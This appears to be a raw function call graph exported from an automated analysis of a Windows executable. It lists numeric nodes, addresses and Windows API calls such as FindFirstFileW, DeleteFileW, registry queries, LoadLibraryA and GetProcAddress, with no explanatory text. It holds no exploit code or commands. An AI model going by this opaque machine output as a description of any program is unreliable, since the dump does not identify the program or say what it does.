8 API calls 106419->106420 106421 f45080 106420->106421 106423 f4508d 106421->106423 106424 f842e3 106421->106424 106426 f4ad69 8 API calls 106422->106426 106429 f450b3 ___scrt_fastfail 106422->106429 106423->106422 106425 f45097 106423->106425 106424->106429 106431 f84326 106424->106431 106433 f4ae03 8 API calls 106424->106433 106445 f459dc 106425->106445 106426->106429 106432 f45118 Shell_NotifyIconW 106429->106432 106430 f46aa4 8 API calls 106430->106429 106455 f5fe35 51 API calls 106431->106455 106432->106434 106435 f8430d 106433->106435 106434->106396 106454 faa08a 9 API calls 106435->106454 106438 f84345 106440 f459dc 8 API calls 106438->106440 106439 f84318 106441 f46aa4 8 API calls 106439->106441 106442 f84356 106440->106442 106441->106431 106443 f459dc 8 API calls 106442->106443 106443->106429 106444->106391 106446 f459f3 106445->106446 106447 f84816 106445->106447 106456 f45a04 106446->106456 106448 f6012b 8 API calls 106447->106448 106451 f84820 _wcslen 106448->106451 106450 f450a5 106450->106430 106452 f6015b 8 API calls 106451->106452 106453 f84859 __fread_nolock 106452->106453 106454->106439 106455->106438 106457 f45a14 _wcslen 106456->106457 106458 f84878 106457->106458 106459 f45a27 106457->106459 106461 f6012b 8 API calls 106458->106461 106460 f46c63 8 API calls 106459->106460 106462 f45a34 __fread_nolock 106460->106462 106463 f84882 106461->106463 106462->106450 106464 f6015b 8 API calls 106463->106464 106465 f848b2 __fread_nolock 106464->106465 106467 f4ae03 8 API calls 106466->106467 106468 fad9ad 106467->106468 106469 f4ae03 8 API calls 106468->106469 106470 fad9b6 106469->106470 106471 f4ae03 8 API calls 106470->106471 106472 fad9bf 106471->106472 106490 f43ff7 106472->106490 106477 fad9e5 106479 f43e34 8 API calls 106477->106479 106478 f459dc 8 API calls 106478->106477 106480 fad9f9 FindFirstFileW 106479->106480 106481 fada85 FindClose 106480->106481 106484 fada18 106480->106484 106486 fada90 106481->106486 106482 fada60 FindNextFileW 106482->106484 106483 f4ad69 8 API calls 106483->106484 106484->106481 106484->106482 106484->106483 106485 f46aa4 8 API calls 106484->106485 106487 f459dc 8 API calls 106484->106487 106485->106484 106486->105986 106488 fada51 DeleteFileW 106487->106488 106488->106482 106489 fada7c FindClose 106488->106489 106489->106486 106502 f822a0 106490->106502 106493 f44023 106496 f47467 8 API calls 106493->106496 106494 f4403e 106495 f4abe7 8 API calls 106494->106495 106497 f4402f 106495->106497 106496->106497 106504 f4699d 106497->106504 106500 fae7da GetFileAttributesW 106501 fad9d3 106500->106501 106501->106477 106501->106478 106503 f44004 GetFullPathNameW 106502->106503 106503->106493 106503->106494 106505 f469ab 106504->106505 106506 f48635 8 API calls 106505->106506 106507 f4403b 106506->106507 106507->106500 106508->105997 106509->105999 106510->106003 106512 fb15e0 106511->106512 106513 f6012b 8 API calls 106512->106513 106514 fb15e7 106513->106514 106517 faf9df 106514->106517 106516 fb1621 106516->106014 106518 f4b159 8 API calls 106517->106518 106519 faf9f2 CharLowerBuffW 106518->106519 106525 fafa05 106519->106525 106520 fafa0f ___scrt_fastfail 106520->106516 106521 fafa43 106523 fafa55 106521->106523 106526 f453e8 8 API calls 106521->106526 106522 f453e8 8 API calls 106522->106525 106524 f6015b 8 API calls 106523->106524 106530 fafa83 106524->106530 106525->106520 106525->106521 106525->106522 106526->106523 106527 fafaa5 106535 fafb36 106527->106535 106530->106527 106550 faf917 8 API calls 106530->106550 106531 fafae2 106531->106520 106532 f6012b 8 API calls 106531->106532 106533 fafafc 106532->106533 106534 f6015b 8 API calls 106533->106534 106534->106520 106536 f4ae03 8 API calls 106535->106536 106537 fafb68 106536->106537 106538 f4ae03 8 API calls 106537->106538 106539 fafb71 106538->106539 106540 f4ae03 8 API calls 106539->106540 106546 fafb7a 106540->106546 106541 f47467 8 API calls 106541->106546 106542 f666d8 GetStringTypeW 106542->106546 106544 f66621 39 API calls 106544->106546 106545 fafb36 40 API calls 106545->106546 106546->106541 106546->106542 106546->106544 106546->106545 106547 fafe3e 106546->106547 106548 f49c50 8 API calls 106546->106548 106549 f4ad69 8 API calls 106546->106549 106551 f66702 GetStringTypeW _strftime 106546->106551 106547->106531 106548->106546 106549->106546 106550->106530 106551->106546 106552->106023 106553->106032 106554->106039 106555->106049 106556->106053 106557->105850 106558->105839 106559->105876 106560->105816 106561->105840 106562->105818 106563->105818 106564->105818 106565->105828 106566->105838 106567->105837 106568->105837 106570 f4b249 106569->106570 106574 f4b271 ISource 106569->106574 106571 f4b257 106570->106571 106572 f4b23b 8 API calls 106570->106572 106573 f4b25d 106571->106573 106575 f4b23b 8 API calls 106571->106575 106572->106571 106573->106574 106600 f4b670 8 API calls ISource 106573->106600 106574->105846 106575->106573 106577->105870 106578->105870 106601 f4be10 106579->106601 106581 f4ae45 106582 f8fd3d 106581->106582 106583 f4ae53 106581->106583 106610 f4a35b 8 API calls 106582->106610 106585 f6012b 8 API calls 106583->106585 106587 f4ae64 106585->106587 106586 f8fd48 106588 f4ae03 8 API calls 106587->106588 106589 f4ae6e 106588->106589 106590 f4ae7d 106589->106590 106591 f4ad69 8 API calls 106589->106591 106592 f6012b 8 API calls 106590->106592 106591->106590 106593 f4ae87 106592->106593 106609 f4ad0b 39 API calls 106593->106609 106595 f4aeab 106595->105870 106596->105818 106597->105870 106598->105820 106599->105818 106600->106574 106602 f4c057 106601->106602 106607 f4be23 106601->106607 106602->106581 106604 f4ae03 8 API calls 106604->106607 106605 f4becd 106605->106581 106607->106604 106607->106605 106611 f60592 5 API calls __Init_thread_wait 106607->106611 106612 f603f3 29 API calls __onexit 106607->106612 106613 f60548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 106607->106613 106609->106595 106610->106586 106611->106607 106612->106607 106613->106607 106614->105886 106615->105886 106616->105892 106617->105887 106618->105721 106619->105713 106620->105716 106621->105716 106622 f511fc 106631 f51205 __fread_nolock 106622->106631 106623 f47e30 52 API calls 106623->106631 106624 f9646a 106643 fa115e 8 API calls __fread_nolock 106624->106643 106626 f96476 106630 f4ad69 8 API calls 106626->106630 106634 f50e0c ISource __fread_nolock 106626->106634 106627 f51256 106628 f46c63 8 API calls 106627->106628 106628->106634 106629 f6012b 8 API calls 106629->106631 106630->106634 106631->106623 106631->106624 106631->106627 106631->106629 106632 f9648f 106631->106632 106633 f6015b 8 API calls 106631->106633 106631->106634 106633->106631 106637 f965f2 106634->106637 106638 f967be 106634->106638 106640 f513b2 106634->106640 106642 f50e97 106634->106642 106645 f5e1db 8 API calls ISource 106634->106645 106644 f6d2b5 39 API calls 106637->106644 106638->106642 106646 f6d2b5 39 API calls 106638->106646 106640->106642 106647 f5bcc1 39 API calls 106640->106647 106643->106626 106644->106637 106645->106634 106646->106642 106647->106642 106960 f92dd0 106975 f4dd50 ISource 106960->106975 106961 f4e0b1 PeekMessageW 106961->106975 106962 f4dda7 GetInputState 106962->106961 106962->106975 106964 f92254 TranslateAcceleratorW 106964->106975 106965 f4e12f PeekMessageW 106965->106975 106966 f4e113 TranslateMessage DispatchMessageW 106966->106965 106967 f4dfa4 timeGetTime 106967->106975 106968 f4e14f Sleep 106990 f4e160 106968->106990 106969 f9310a Sleep 106969->106990 106970 f5ef0e timeGetTime 106970->106990 106971 f92370 timeGetTime 107027 f5a921 9 API calls 106971->107027 106973 fadac1 46 API calls 106973->106990 106974 f931a1 GetExitCodeProcess 106976 f931cd CloseHandle 106974->106976 106977 f931b7 WaitForSingleObject 106974->106977 106975->106961 106975->106962 106975->106964 106975->106965 106975->106966 106975->106967 106975->106968 106975->106969 106975->106971 106980 f4df75 106975->106980 106987 f4f1e0 217 API calls 106975->106987 106988 f519c0 217 API calls 106975->106988 106989 f4c210 217 API calls 106975->106989 106992 f4e2f0 106975->106992 106999 f4e570 106975->106999 107022 f5f3b7 106975->107022 107028 fb4199 8 API calls 106975->107028 107029 fb3d0b 81 API calls __wsopen_s 106975->107029 106976->106990 106977->106975 106977->106976 106978 f92fc7 106978->106980 106979 fd317d GetForegroundWindow 106979->106990 106982 f9323f Sleep 106982->106975 106987->106975 106988->106975 106989->106975 106990->106970 106990->106973 106990->106974 106990->106975 106990->106978 106990->106979 106990->106980 106990->106982 107030 fc5ddf 8 API calls 106990->107030 107031 faefbc QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 106990->107031 106993 f4e323 106992->106993 106994 f4e30f 106992->106994 107064 fb3d0b 81 API calls __wsopen_s 106993->107064 107032 f4d7f0 106994->107032 106996 f4e31a 106996->106975 106998 f9350b 106998->106998 107000 f4e5b0 106999->107000 107019 f4e67c ISource 107000->107019 107081 f60592 5 API calls __Init_thread_wait 107000->107081 107003 f93560 107005 f4ae03 8 API calls 107003->107005 107003->107019 107004 f4ae03 8 API calls 107004->107019 107006 f9357a 107005->107006 107082 f603f3 29 API calls __onexit 107006->107082 107007 f4acbd 39 API calls 107007->107019 107010 f93584 107083 f60548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 107010->107083 107012 fb3d0b 81 API calls 107012->107019 107014 f4ad69 8 API calls 107014->107019 107015 f4f1e0 217 API calls 107015->107019 107016 f4e981 107016->106975 107019->107004 107019->107007 107019->107012 107019->107014 107019->107015 107019->107016 107021 f50b40 8 API calls 107019->107021 107080 f5b215 217 API calls 107019->107080 107084 f60592 5 API calls __Init_thread_wait 107019->107084 107085 f603f3 29 API calls __onexit 107019->107085 107086 f60548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 107019->107086 107087 fc4f5b 217 API calls 107019->107087 107088 fc7048 217 API calls 107019->107088 107021->107019 107024 f5f3ca 107022->107024 107026 f5f3d3 107022->107026 107023 f5f3f7 IsDialogMessageW 107023->107024 107023->107026 107024->106975 107025 f9f895 GetClassLongW 107025->107023 107025->107026 107026->107023 107026->107024 107026->107025 107027->106975 107028->106975 107029->106975 107030->106990 107031->106990 107033 f4f1e0 217 API calls 107032->107033 107053 f4d82d 107033->107053 107034 f9215a 107078 fb3d0b 81 API calls __wsopen_s 107034->107078 107036 f4d89b ISource 107036->106996 107037 f4dc65 107037->107036 107048 f6015b 8 API calls 107037->107048 107038 f4d953 107038->107037 107040 f4d95e 107038->107040 107039 f4db8f 107041 f4dba4 107039->107041 107042 f9214b 107039->107042 107044 f6012b 8 API calls 107040->107044 107045 f6012b 8 API calls 107041->107045 107077 fc5e8c 8 API calls 107042->107077 107043 f4da48 107049 f6015b 8 API calls 107043->107049 107051 f4d965 __fread_nolock 107044->107051 107056 f4d9fa 107045->107056 107047 f6012b 8 API calls 107047->107053 107048->107051 107059 f4d9b9 ISource __fread_nolock 107049->107059 107050 f6012b 8 API calls 107052 f4d986 107050->107052 107051->107050 107051->107052 107052->107059 107065 f4c0f0 107052->107065 107053->107034 107053->107036 107053->107037 107053->107038 107053->107043 107053->107047 107053->107059 107055 f9213a 107076 fb3d0b 81 API calls __wsopen_s 107055->107076 107056->106996 107059->107039 107059->107055 107059->107056 107060 f92115 107059->107060 107062 f920f3 107059->107062 107073 f41c48 217 API calls 107059->107073 107075 fb3d0b 81 API calls __wsopen_s 107060->107075 107074 fb3d0b 81 API calls __wsopen_s 107062->107074 107064->106998 107066 f4c156 107065->107066 107067 f4c12a 107065->107067 107069 f4f1e0 217 API calls 107066->107069 107068 f4e570 217 API calls 107067->107068 107071 f4c130 107068->107071 107070 f907d2 107069->107070 107070->107071 107079 fb3d0b 81 API calls __wsopen_s 107070->107079 107071->107059 107073->107059 107074->107056 107075->107056 107076->107056 107077->107034 107078->107036 107079->107071 107080->107019 107081->107003 107082->107010 107083->107019 107084->107019 107085->107019 107086->107019 107087->107019 107088->107019 107089 f4fd5f 107090 f4fd73 107089->107090 107096 f502c5 107089->107096 107091 f4fd85 107090->107091 107094 f6012b 8 API calls 107090->107094 107092 f945b3 107091->107092 107095 f4fdde 107091->107095 107124 f4a35b 8 API calls 107091->107124 107127 fb183e 8 API calls 107092->107127 107094->107091 107098 f519c0 217 API calls 107095->107098 107115 f4f33d ISource 107095->107115 107096->107091 107099 f4ad69 8 API calls 107096->107099 107122 f4f216 ISource 107098->107122 107099->107091 107100 f952b2 107131 fb3d0b 81 API calls __wsopen_s 107100->107131 107101 f6012b 8 API calls 107101->107122 107102 f50cf0 40 API calls 107102->107122 107103 f50535 107108 f4ad69 8 API calls 107103->107108 107103->107115 107105 f951e1 107130 fb3d0b 81 API calls __wsopen_s 107105->107130 107106 f94c62 107112 f4ad69 8 API calls 107106->107112 107106->107115 107108->107115 107110 f60592 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 107110->107122 107111 f4ad69 8 API calls 107111->107122 107112->107115 107113 f50830 217 API calls 107113->107122 107114 f4ae03 8 API calls 107114->107122 107116 f603f3 29 API calls pre_c_initialization 107116->107122 107118 f9509c 107128 fb3d0b 81 API calls __wsopen_s 107118->107128 107120 f4f94e ISource 107129 fb3d0b 81 API calls __wsopen_s 107120->107129 107122->107100 107122->107101 107122->107102 107122->107103 107122->107105 107122->107106 107122->107110 107122->107111 107122->107113 107122->107114 107122->107115 107122->107116 107122->107118 107122->107120 107123 f60548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 107122->107123 107125 fc7db9 53 API calls __wsopen_s 107122->107125 107126 fc7ef8 65 API calls 107122->107126 107123->107122 107124->107091 107125->107122 107126->107122 107127->107115 107128->107120 107129->107115 107130->107115 107131->107115 106648 f42f78 106651 f42f92 106648->106651 106652 f42fa9 106651->106652 106653 f4300b 106652->106653 106654 f4300d 106652->106654 106655 f42fae 106652->106655 106656 f42ff2 DefWindowProcW 106653->106656 106657 f43013 106654->106657 106658 f83084 106654->106658 106659 f43087 PostQuitMessage 106655->106659 106660 f42fbb 106655->106660 106664 f42f8c 106656->106664 106665 f4303f SetTimer RegisterWindowMessageW 106657->106665 106666 f4301a 106657->106666 106706 f44286 10 API calls 106658->106706 106659->106664 106661 f42fc6 106660->106661 106662 f830f1 106660->106662 106667 f42fd0 106661->106667 106668 f43091 106661->106668 106709 fac631 65 API calls ___scrt_fastfail 106662->106709 106665->106664 106669 f43068 CreatePopupMenu 106665->106669 106672 f43023 KillTimer 106666->106672 106673 f83025 106666->106673 106674 f830d6 106667->106674 106675 f42fdb 106667->106675 106696 f5fc73 106668->106696 106669->106664 106671 f830a5 106707 f5f09a 40 API calls 106671->106707 106681 f42f14 Shell_NotifyIconW 106672->106681 106679 f8302a 106673->106679 106680 f83060 MoveWindow 106673->106680 106674->106656 106708 fa11b9 8 API calls 106674->106708 106682 f43075 106675->106682 106683 f42fe6 106675->106683 106676 f83103 106676->106656 106676->106664 106684 f8304f SetFocus 106679->106684 106685 f83030 106679->106685 106680->106664 106686 f43036 106681->106686 106704 f430a2 75 API calls ___scrt_fastfail 106682->106704 106683->106656 106693 f42f14 Shell_NotifyIconW 106683->106693 106684->106664 106685->106683 106688 f83039 106685->106688 106703 f447a8 DeleteObject DestroyWindow 106686->106703 106705 f44286 10 API calls 106688->106705 106691 f43085 106691->106664 106694 f830ca 106693->106694 106695 f43989 60 API calls 106694->106695 106695->106653 106697 f5fd11 106696->106697 106698 f5fc8b ___scrt_fastfail 106696->106698 106697->106664 106699 f45033 55 API calls 106698->106699 106701 f5fcb2 106699->106701 106700 f5fcfa KillTimer SetTimer 106700->106697 106701->106700 106702 f9fbc2 Shell_NotifyIconW 106701->106702 106702->106700 106703->106664 106704->106691 106705->106664 106706->106671 106707->106683 106708->106653 106709->106676 107132 f41098 107137 f44e68 107132->107137 107136 f410a7 107138 f4ae03 8 API calls 107137->107138 107139 f44e7f GetVersionExW 107138->107139 107140 f47467 8 API calls 107139->107140 107141 f44ecc 107140->107141 107142 f48635 8 API calls 107141->107142 107145 f44f02 107141->107145 107143 f44ef6 107142->107143 107144 f4699d 8 API calls 107143->107144 107144->107145 107146 f44fa6 GetCurrentProcess IsWow64Process 107145->107146 107148 f84259 107145->107148 107147 f44fc2 107146->107147 107149 f8429e GetSystemInfo 107147->107149 107150 f44fda LoadLibraryA 107147->107150 107151 f45027 GetSystemInfo 107150->107151 107152 f44feb GetProcAddress 107150->107152 107153 f45001 107151->107153 107152->107151 107154 f44ffb GetNativeSystemInfo 107152->107154 107155 f45005 FreeLibrary 107153->107155 107156 f4109d 107153->107156 107154->107153 107155->107156 107157 f603f3 29 API calls __onexit 107156->107157 107157->107136 107158 f945d7 107169 f5e28e 107158->107169 107160 f945ed 107161 f94668 107160->107161 107178 f5a921 9 API calls 107160->107178 107163 f4c210 217 API calls 107161->107163 107165 f946b4 107163->107165 107167 f9515e 107165->107167 107180 fb3d0b 81 API calls __wsopen_s 107165->107180 107166 f94648 107166->107165 107179 fb21a8 8 API calls 107166->107179 107170 f5e29c 107169->107170 107171 f5e2af 107169->107171 107181 f4a35b 8 API calls 107170->107181 107173 f5e2b4 107171->107173 107174 f5e2e2 107171->107174 107175 f6012b 8 API calls 107173->107175 107182 f4a35b 8 API calls 107174->107182 107177 f5e2a6 107175->107177 107177->107160 107178->107166 107179->107161 107180->107167 107181->107177 107182->107177 107183 f4105b 107188 f43ae4 107183->107188 107185 f4106a 107219 f603f3 29 API calls __onexit 107185->107219 107187 f41074 107189 f43af4 __wsopen_s 107188->107189 107190 f4ae03 8 API calls 107189->107190 107191 f43baa 107190->107191 107192 f43dd1 10 API calls 107191->107192 107193 f43bb3 107192->107193 107220 f43a75 107193->107220 107196 f459dc 8 API calls 107197 f43bcc 107196->107197 107226 f458dc 107197->107226 107200 f4ae03 8 API calls 107201 f43be4 107200->107201 107202 f4abe7 8 API calls 107201->107202 107203 f43bed RegOpenKeyExW 107202->107203 107204 f839cf RegQueryValueExW 107203->107204 107210 f43c0f 107203->107210 107205 f839ec 107204->107205 107206 f83a65 RegCloseKey 107204->107206 107207 f6015b 8 API calls 107205->107207 107206->107210 107218 f83a77 _wcslen 107206->107218 107208 f83a05 107207->107208 107209 f43966 8 API calls 107208->107209 107212 f83a10 RegQueryValueExW 107209->107212 107210->107185 107211 f453e8 8 API calls 107211->107218 107213 f83a2d 107212->107213 107215 f83a47 ISource 107212->107215 107214 f47467 8 API calls 107213->107214 107214->107215 107215->107206 107216 f4a1d4 8 API calls 107216->107218 107217 f458dc 8 API calls 107217->107218 107218->107210 107218->107211 107218->107216 107218->107217 107219->107187 107221 f822a0 __wsopen_s 107220->107221 107222 f43a82 GetFullPathNameW 107221->107222 107223 f43aa4 107222->107223 107224 f47467 8 API calls 107223->107224 107225 f43ac2 107224->107225 107225->107196 107227 f458eb 107226->107227 107231 f4590c __fread_nolock 107226->107231 107229 f6015b 8 API calls 107227->107229 107228 f6012b 8 API calls 107230 f43bdb 107228->107230 107229->107231 107230->107200 107231->107228 107232 f92f96 107247 f4dd50 ISource 107232->107247 107233 f4e0b1 PeekMessageW 107233->107247 107234 f4dda7 GetInputState 107234->107233 107234->107247 107235 f5f3b7 2 API calls 107235->107247 107236 f92254 TranslateAcceleratorW 107236->107247 107237 f4e12f PeekMessageW 107237->107247 107238 f4e113 TranslateMessage DispatchMessageW 107238->107237 107239 f4dfa4 timeGetTime 107239->107247 107240 f4e14f Sleep 107262 f4e160 107240->107262 107241 f9310a Sleep 107241->107262 107242 f5ef0e timeGetTime 107242->107262 107243 f92370 timeGetTime 107264 f5a921 9 API calls 107243->107264 107245 fadac1 46 API calls 107245->107262 107246 f931a1 GetExitCodeProcess 107248 f931cd CloseHandle 107246->107248 107249 f931b7 WaitForSingleObject 107246->107249 107247->107233 107247->107234 107247->107235 107247->107236 107247->107237 107247->107238 107247->107239 107247->107240 107247->107241 107247->107243 107252 f4df75 107247->107252 107256 f4e2f0 217 API calls 107247->107256 107257 f4e570 217 API calls 107247->107257 107259 f4f1e0 217 API calls 107247->107259 107260 f519c0 217 API calls 107247->107260 107261 f4c210 217 API calls 107247->107261 107265 fb4199 8 API calls 107247->107265 107266 fb3d0b 81 API calls __wsopen_s 107247->107266 107248->107262 107249->107247 107249->107248 107250 f92fc7 107250->107252 107251 fd317d GetForegroundWindow 107251->107262 107254 f9323f Sleep 107254->107247 107256->107247 107257->107247 107259->107247 107260->107247 107261->107247 107262->107242 107262->107245 107262->107246 107262->107247 107262->107250 107262->107251 107262->107252 107262->107254 107267 fc5ddf 8 API calls 107262->107267 107268 faefbc QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 107262->107268 107264->107247 107265->107247 107266->107247 107267->107262 107268->107262 107269 f41044 107274 f42c6f 107269->107274 107271 f4104a 107310 f603f3 29 API calls __onexit 107271->107310 107273 f41054 107311 f44045 107274->107311 107278 f42ce6 107279 f4ae03 8 API calls 107278->107279 107280 f42cf0 107279->107280 107281 f4ae03 8 API calls 107280->107281 107282 f42cfa 107281->107282 107283 f4ae03 8 API calls 107282->107283 107284 f42d04 107283->107284 107285 f4ae03 8 API calls 107284->107285 107286 f42d42 107285->107286 107287 f4ae03 8 API calls 107286->107287 107288 f42e0e 107287->107288 107321 f4540c 107288->107321 107292 f42e40 107293 f4ae03 8 API calls 107292->107293 107294 f42e4a 107293->107294 107295 f51fd0 9 API calls 107294->107295 107296 f42e75 107295->107296 107348 f42b93 107296->107348 107298 f42e91 107299 f42ea1 GetStdHandle 107298->107299 107300 f42ef6 107299->107300 107301 f82ff2 107299->107301 107304 f42f03 OleInitialize 107300->107304 107301->107300 107302 f82ffb 107301->107302 107303 f6012b 8 API calls 107302->107303 107305 f83002 107303->107305 107304->107271 107355 fb07ee InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 107305->107355 107307 f8300b 107310->107273 107357 f4409e 107311->107357 107314 f4409e 8 API calls 107315 f4407d 107314->107315 107316 f4ae03 8 API calls 107315->107316 107317 f44089 107316->107317 107318 f47467 8 API calls 107317->107318 107319 f42ca5 107318->107319 107320 f42a8d 6 API calls 107319->107320 107320->107278 107322 f4ae03 8 API calls 107321->107322 107323 f4541c 107322->107323 107324 f4ae03 8 API calls 107323->107324 107325 f45424 107324->107325 107364 f470c5 107325->107364 107328 f470c5 8 API calls 107329 f45434 107328->107329 107330 f4ae03 8 API calls 107329->107330 107331 f4543f 107330->107331 107332 f6012b 8 API calls 107331->107332 107333 f42e18 107332->107333 107334 f42af5 107333->107334 107335 f42b03 107334->107335 107336 f4ae03 8 API calls 107335->107336 107337 f42b0e 107336->107337 107338 f4ae03 8 API calls 107337->107338 107339 f42b19 107338->107339 107340 f4ae03 8 API calls 107339->107340 107341 f42b24 107340->107341 107342 f4ae03 8 API calls 107341->107342 107343 f42b2f 107342->107343 107344 f470c5 8 API calls 107343->107344 107345 f42b3a 107344->107345 107346 f6012b 8 API calls 107345->107346 107347 f42b41 RegisterWindowMessageW 107346->107347 107347->107292 107349 f82fde 107348->107349 107350 f42ba3 107348->107350 107367 fb3978 8 API calls 107349->107367 107351 f6012b 8 API calls 107350->107351 107354 f42bab 107351->107354 107353 f82fe9 107354->107298 107355->107307 107358 f4ae03 8 API calls 107357->107358 107359 f440a9 107358->107359 107360 f4ae03 8 API calls 107359->107360 107361 f440b1 107360->107361 107362 f4ae03 8 API calls 107361->107362 107363 f44073 107362->107363 107363->107314 107365 f4ae03 8 API calls 107364->107365 107366 f4542c 107365->107366 107366->107328 107367->107353 107369 f4e485 107370 f4b940 217 API calls 107369->107370 107371 f4e493 107370->107371 106710 f41727 SystemParametersInfoW 106711 f4e360 106714 f59ee3 106711->106714 106713 f4e36c 106715 f59f04 106714->106715 106720 f59f61 106714->106720 106717 f4f1e0 217 API calls 106715->106717 106715->106720 106721 f59f35 106717->106721 106718 f97f48 106718->106718 106719 f59fa5 106719->106713 106720->106719 106723 fb3d0b 81 API calls __wsopen_s 106720->106723 106721->106719 106721->106720 106722 f4ad69 8 API calls 106721->106722 106722->106720 106723->106718 107372 f6f04e 107373 f6f05a ___scrt_is_nonwritable_in_current_image 107372->107373 107374 f6f066 107373->107374 107375 f6f07b 107373->107375 107391 f72b68 20 API calls __dosmaperr 107374->107391 107385 f694dd EnterCriticalSection 107375->107385 107378 f6f087 107386 f6f0bb 107378->107386 107379 f6f06b 107392 f72aac 26 API calls __fread_nolock 107379->107392 107384 f6f076 __fread_nolock 107385->107378 107394 f6f0e6 107386->107394 107388 f6f0c8 107390 f6f094 107388->107390 107414 f72b68 20 API calls __dosmaperr 107388->107414 107393 f6f0b1 LeaveCriticalSection __fread_nolock 107390->107393 107391->107379 107392->107384 107393->107384 107395 f6f0f4 107394->107395 107396 f6f10e 107394->107396 107425 f72b68 20 API calls __dosmaperr 107395->107425 107415 f6dca5 107396->107415 107399 f6f0f9 107426 f72aac 26 API calls __fread_nolock 107399->107426 107400 f6f117 107422 f79759 107400->107422 107404 f6f19f 107408 f6f1bc 107404->107408 107410 f6f1ce 107404->107410 107405 f6f21b 107406 f6f228 107405->107406 107405->107410 107428 f72b68 20 API calls __dosmaperr 107406->107428 107427 f6f3ff 31 API calls 4 library calls 107408->107427 107411 f6f104 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 107410->107411 107429 f6f27b 30 API calls 2 library calls 107410->107429 107411->107388 107412 f6f1c6 107412->107411 107414->107390 107416 f6dcc6 107415->107416 107417 f6dcb1 107415->107417 107416->107400 107430 f72b68 20 API calls __dosmaperr 107417->107430 107419 f6dcb6 107431 f72aac 26 API calls __fread_nolock 107419->107431 107421 f6dcc1 107421->107400 107432 f795d6 107422->107432 107424 f6f133 107424->107404 107424->107405 107424->107411 107425->107399 107426->107411 107427->107412 107428->107411 107429->107411 107430->107419 107431->107421 107433 f795e2 ___scrt_is_nonwritable_in_current_image 107432->107433 107434 f79602 107433->107434 107435 f795ea 107433->107435 107437 f796b6 107434->107437 107441 f7963a 107434->107441 107467 f72b55 20 API calls __dosmaperr 107435->107467 107472 f72b55 20 API calls __dosmaperr 107437->107472 107438 f795ef 107468 f72b68 20 API calls __dosmaperr 107438->107468 107440 f796bb 107473 f72b68 20 API calls __dosmaperr 107440->107473 107457 f75497 EnterCriticalSection 107441->107457 107445 f796c3 107474 f72aac 26 API calls __fread_nolock 107445->107474 107446 f79640 107448 f79664 107446->107448 107449 f79679 107446->107449 107469 f72b68 20 API calls __dosmaperr 107448->107469 107458 f796db 107449->107458 107452 f79669 107470 f72b55 20 API calls __dosmaperr 107452->107470 107453 f795f7 __fread_nolock 107453->107424 107454 f79674 107471 f796ae LeaveCriticalSection __wsopen_s 107454->107471 107457->107446 107459 f75714 __wsopen_s 26 API calls 107458->107459 107460 f796ed 107459->107460 107461 f79706 SetFilePointerEx 107460->107461 107462 f796f5 107460->107462 107463 f7971e GetLastError 107461->107463 107466 f796fa 107461->107466 107475 f72b68 20 API calls __dosmaperr 107462->107475 107476 f72b32 20 API calls __dosmaperr 107463->107476 107466->107454 107467->107438 107468->107453 107469->107452 107470->107454 107471->107453 107472->107440 107473->107445 107474->107453 107475->107466 107476->107466 107477 f431c8 107478 f431d5 __wsopen_s 107477->107478 107479 f431ee 107478->107479 107480 f83330 ___scrt_fastfail 107478->107480 107481 f43ff7 9 API calls 107479->107481 107482 f8334c GetOpenFileNameW 107480->107482 107483 f431f7 107481->107483 107484 f8339b 107482->107484 107493 f4318a 107483->107493 107486 f47467 8 API calls 107484->107486 107488 f833b0 107486->107488 107488->107488 107490 f4320c 107511 f4515f 107490->107511 107494 f822a0 __wsopen_s 107493->107494 107495 f43197 GetLongPathNameW 107494->107495 107496 f47467 8 API calls 107495->107496 107497 f431bf 107496->107497 107498 f43c2f 107497->107498 107499 f4ae03 8 API calls 107498->107499 107500 f43c41 107499->107500 107501 f43ff7 9 API calls 107500->107501 107502 f43c4c 107501->107502 107503 f43c57 107502->107503 107507 f83b44 107502->107507 107504 f458dc 8 API calls 107503->107504 107506 f43c63 107504->107506 107541 f412f4 107506->107541 107509 f83b66 107507->107509 107547 f5e224 41 API calls 107507->107547 107510 f43c76 107510->107490 107548 f454de 107511->107548 107514 f8436b 107570 fb33e2 107514->107570 107515 f454de 93 API calls 107517 f45198 107515->107517 107517->107514 107519 f451a0 107517->107519 107518 f8437c 107520 f8439d 107518->107520 107521 f84380 107518->107521 107523 f84388 107519->107523 107524 f451ac 107519->107524 107522 f6015b 8 API calls 107520->107522 107610 f4554c 107521->107610 107540 f843e2 107522->107540 107616 fae048 82 API calls 107523->107616 107609 f4326c 134 API calls 2 library calls 107524->107609 107528 f43216 107529 f84396 107529->107520 107530 f84593 107531 f8459b 107530->107531 107532 f4554c 68 API calls 107531->107532 107619 fa9f4f 81 API calls __wsopen_s 107531->107619 107532->107531 107537 f4a1d4 8 API calls 107537->107540 107540->107530 107540->107531 107540->107537 107592 fa9d32 107540->107592 107595 f4aa39 107540->107595 107603 f44bb8 107540->107603 107617 fa9c61 41 API calls _wcslen 107540->107617 107618 fb1243 8 API calls 107540->107618 107542 f41306 107541->107542 107546 f41325 __fread_nolock 107541->107546 107544 f6015b 8 API calls 107542->107544 107543 f6012b 8 API calls 107545 f4133c 107543->107545 107544->107546 107545->107510 107546->107543 107547->107507 107620 f454a3 LoadLibraryA 107548->107620 107553 f84660 107556 f4554c 68 API calls 107553->107556 107554 f45509 LoadLibraryExW 107628 f4546c LoadLibraryA 107554->107628 107557 f84667 107556->107557 107559 f4546c 3 API calls 107557->107559 107561 f8466f 107559->107561 107649 f456aa 107561->107649 107562 f45533 107562->107561 107563 f4553f 107562->107563 107565 f4554c 68 API calls 107563->107565 107567 f45184 107565->107567 107567->107514 107567->107515 107569 f84696 107571 fb33fe 107570->107571 107572 f456d4 64 API calls 107571->107572 107573 fb3412 107572->107573 107928 fb3551 107573->107928 107576 f456aa 40 API calls 107577 fb3441 107576->107577 107578 f456aa 40 API calls 107577->107578 107579 fb3451 107578->107579 107580 f456aa 40 API calls 107579->107580 107581 fb346c 107580->107581 